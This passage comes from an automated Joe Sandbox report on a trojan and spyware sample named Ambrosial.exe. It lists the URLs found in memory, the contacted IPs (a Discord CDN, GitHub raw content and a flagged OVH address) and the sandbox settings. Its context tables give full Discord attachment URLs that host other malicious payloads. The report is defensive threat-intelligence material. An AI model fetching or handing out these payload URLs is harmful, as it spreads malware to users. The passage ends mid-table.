                                                    http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceAppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faultAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsatAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.jiyu-kobo.co.jp/MicrosoftAmbrosial.exe, 00000003.00000003.522806659.000002024E28E000.00000004.00000001.sdmpfalse
                                                                  • 0%, Virustotal, Browse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://tempuri.org/Entity/Id15ResponseAppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id6ResponseAppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://api.ip.sb/ipAppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2004/04/scAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://tempuri.org/Entity/Id9ResponseAppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AppLaunch.exe, 00000004.00000002.418807573.0000000008257000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://tempuri.org/Entity/Id20AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://tempuri.org/Entity/Id21AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://tempuri.org/Entity/Id22AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://tempuri.org/Entity/Id23AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://tempuri.org/Entity/Id24AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://tempuri.org/Entity/Id24ResponseAppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://tempuri.org/Entity/Id1ResponseAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://en.wAmbrosial.exe, 00000003.00000003.542531599.0000020255DF7000.00000004.00000001.sdmp, Ambrosial.exe, 00000003.00000003.537582045.0000020255DF8000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedAppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/fault$AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressingAppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://www.newtonsoft.com/jsonschemaAmbrosial.exe, 00000003.00000003.518981093.000002024D67F000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/trustAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id10AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id11AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id12AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id16ResponseAppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tempuri.org/Entity/Id13AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://tempuri.org/Entity/Id14AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://tempuri.org/Entity/Id15AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://tempuri.org/Entity/Id16AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/NonceAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id17AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id18AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id5ResponseAppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id19AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsAppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://tempuri.org/Entity/Id10ResponseAppLaunch.exe, 00000004.00000002.416581209.0000000007315000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RenewAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id8ResponseAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0AppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTAppLaunch.exe, 00000004.00000002.416342243.00000000072A0000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentityAppLaunch.exe, 00000004.00000002.416317845.000000000729C000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/soap/envelope/AppLaunch.exe, 00000004.00000002.416012073.0000000007201000.00000004.00000001.sdmpfalse
                                                                                                                                        high

                                                                                                                                        Contacted IPs

                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs

                                                                                                                                        Public

                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        185.199.108.133
                                                                                                                                        raw.githubusercontent.comNetherlands
                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                        178.33.87.34
                                                                                                                                        unknownFrance
                                                                                                                                        16276OVHFRtrue
                                                                                                                                        162.159.133.233
                                                                                                                                        cdn.discordapp.comUnited States
                                                                                                                                        13335CLOUDFLARENETUSfalse

                                                                                                                                        Private

                                                                                                                                        IP
                                                                                                                                        192.168.2.1

                                                                                                                                        General Information

                                                                                                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                        Analysis ID:512228
                                                                                                                                        Start date:30.10.2021
                                                                                                                                        Start time:13:50:21
                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 9m 12s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Sample file name:Ambrosial.exe
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                        Number of analysed new started processes analysed:21
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • HDC enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@8/29@2/4
                                                                                                                                        EGA Information:Failed
                                                                                                                                        HDC Information:
                                                                                                                                        • Successful, ratio: 100% (good quality ratio 60%)
                                                                                                                                        • Quality average: 49.8%
                                                                                                                                        • Quality standard deviation: 36.4%
                                                                                                                                        HCA Information:Failed
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Adjust boot time
                                                                                                                                        • Enable AMSI
                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                        Warnings:
                                                                                                                                        Show All
                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.50.102.62, 20.190.160.136, 20.190.160.129, 20.190.160.73, 20.190.160.4, 20.190.160.132, 20.190.160.2, 20.190.160.71, 20.190.160.8, 104.208.16.94, 93.184.221.240, 52.251.79.25, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 23.203.67.116, 23.211.4.86
                                                                                                                                        • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, cdn.onenote.net.edgekey.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                        Simulations

                                                                                                                                        Behavior and APIs

                                                                                                                                        TimeTypeDescription
                                                                                                                                        13:51:51API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                        13:52:07API Interceptor63x Sleep call for process: AppLaunch.exe modified

                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                        IPs

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        185.199.108.133hwid.exeGet hashmaliciousBrowse
                                                                                                                                          fm3FU6sW77.exeGet hashmaliciousBrowse
                                                                                                                                            AY5uCs0HrY.exeGet hashmaliciousBrowse
                                                                                                                                              Pv9fSenm0V.exeGet hashmaliciousBrowse
                                                                                                                                                t63ouMqJ8f.exeGet hashmaliciousBrowse
                                                                                                                                                  gnykCySWj5.exeGet hashmaliciousBrowse
                                                                                                                                                    YRbcV0B6TZ.exeGet hashmaliciousBrowse
                                                                                                                                                      KpDtm40Lne.exeGet hashmaliciousBrowse
                                                                                                                                                        6oi3E5jdTR.exeGet hashmaliciousBrowse
                                                                                                                                                          Software patch by Silensix.exeGet hashmaliciousBrowse
                                                                                                                                                            7D4B1B72B1318CB933E0D6420813499581064F57A713B.exeGet hashmaliciousBrowse
                                                                                                                                                              j1XcBWNHwh.exeGet hashmaliciousBrowse
                                                                                                                                                                mxZECDzIFz.exeGet hashmaliciousBrowse
                                                                                                                                                                  p3IJWYfJZw.exeGet hashmaliciousBrowse
                                                                                                                                                                    XoPspkwdql.exeGet hashmaliciousBrowse
                                                                                                                                                                      Genshin Hack v2.0.exeGet hashmaliciousBrowse
                                                                                                                                                                        JwCS2tlN78.exeGet hashmaliciousBrowse
                                                                                                                                                                          HershyMM.exeGet hashmaliciousBrowse
                                                                                                                                                                            VapeClient.exeGet hashmaliciousBrowse
                                                                                                                                                                              PrimogemsGlitch.exeGet hashmaliciousBrowse
                                                                                                                                                                                178.33.87.34Fortnite Hack Mod v1.4.exeGet hashmaliciousBrowse
                                                                                                                                                                                  GTA5TerrorMM.exeGet hashmaliciousBrowse
                                                                                                                                                                                    162.159.133.233GR01DtRd0N.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • cdn.discordapp.com/attachments/575791168713916457/896907138390192158/ETH2.exe
                                                                                                                                                                                    update[1].exeGet hashmaliciousBrowse
                                                                                                                                                                                    • cdn.discordapp.com/attachments/870656611562180611/873962758427783228/4401fbad77d12fbc.dll
                                                                                                                                                                                    trinitymediaorder-po140521.docGet hashmaliciousBrowse
                                                                                                                                                                                    • cdn.discordapp.com/attachments/843047034843955224/843047170223243314/NioR5xJ1XC9a9v2.exe
                                                                                                                                                                                    NeworderWJO-002,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • cdn.discordapp.com/attachments/841906355832750103/842664739850944512/zBdd3DFJml9UrbJ.exe
                                                                                                                                                                                    proforma invoice No. 42037,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • cdn.discordapp.com/attachments/809311531652087809/839379299009298442/Log_snake.exe
                                                                                                                                                                                    Proforma adjunta N#U00ba 42037,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • cdn.discordapp.com/attachments/809311531652087809/839093777200971776/snake_crypted.exe
                                                                                                                                                                                    Bon_Commande.BC106823.1602202.docGet hashmaliciousBrowse
                                                                                                                                                                                    • cdn.discordapp.com/attachments/801091101888741379/818969220003790912/fodx.exe
                                                                                                                                                                                    PO81105083.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    • cdn.discordapp.com/attachments/801449801975726095/801450821929009152/Purchase_Order.exe
                                                                                                                                                                                    Final documents.docGet hashmaliciousBrowse
                                                                                                                                                                                    • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                                                                                                                                                                                    009845673.docGet hashmaliciousBrowse
                                                                                                                                                                                    • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                                                                                                                                                                                    bPT6aeEo8O.rtfGet hashmaliciousBrowse
                                                                                                                                                                                    • cdn.discordapp.com/attachments/785404703725977620/785404954315194398/buildkelly.exe
                                                                                                                                                                                    00094321 Order.docGet hashmaliciousBrowse
                                                                                                                                                                                    • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

                                                                                                                                                                                    Domains

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    cdn.discordapp.comZ7GlD1x8nW.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    0yzd4z8745.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                                    4kOzeXuUG1.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    XyG3cm8ODX.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                                    gYqJR2QY0c.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.135.233
                                                                                                                                                                                    rpWXlHY6Yu.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.135.233
                                                                                                                                                                                    Ov7BGYlLKa.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    YSRWM1JB1M.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.135.233
                                                                                                                                                                                    YQ5e4ClF2H.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    w6dMh93UEP.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    PK48ObtKys.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                                    pAjlqBTFRL.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                                    AOi1h7cS7L.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                                    gLyTdco9ah.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    7Qjo7zm4qj.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                                    ke8B44hYm7.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    1S3cLXtFN2.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.135.233
                                                                                                                                                                                    toPhqyYHyQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    YBgpKQdR09.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    6PBKRPVQHk.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    raw.githubusercontent.comhwid.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    fm3FU6sW77.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    AY5uCs0HrY.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    Hgny9xwmj6.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.110.133
                                                                                                                                                                                    Pv9fSenm0V.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    t63ouMqJ8f.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.110.133
                                                                                                                                                                                    pq9FtcL817.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.110.133
                                                                                                                                                                                    gnykCySWj5.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    YRbcV0B6TZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    6oi3E5jdTR.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    Software patch by Silensix.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    7D4B1B72B1318CB933E0D6420813499581064F57A713B.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    j1XcBWNHwh.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    mxZECDzIFz.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    4yp2XNjluY.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.109.133
                                                                                                                                                                                    4yp2XNjluY.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                                    UaXwr8aJ4j.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    Software updated by Dylox.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.109.133
                                                                                                                                                                                    XoPspkwdql.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    q4z1p13rwG.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133

                                                                                                                                                                                    ASN

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    CLOUDFLARENETUS1hZPrwS7Cv.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.21.9.146
                                                                                                                                                                                    Z7GlD1x8nW.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    FlC2SuqAZg.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 172.67.160.46
                                                                                                                                                                                    9GILM1SJGl.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.21.9.146
                                                                                                                                                                                    setup_installer.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 172.67.141.157
                                                                                                                                                                                    0yzd4z8745.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    l3v95OpXjY.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 172.67.160.46
                                                                                                                                                                                    LUppz5S8zz.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 172.67.160.46
                                                                                                                                                                                    tFryuw9o8x.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.21.9.146
                                                                                                                                                                                    setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    4kOzeXuUG1.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    8efWa2tKvs.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.21.9.146
                                                                                                                                                                                    XyG3cm8ODX.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                                    gYqJR2QY0c.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.135.233
                                                                                                                                                                                    Lr564s8C52.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    hg6qMeUHoL.exeGet hashmaliciousBrowse
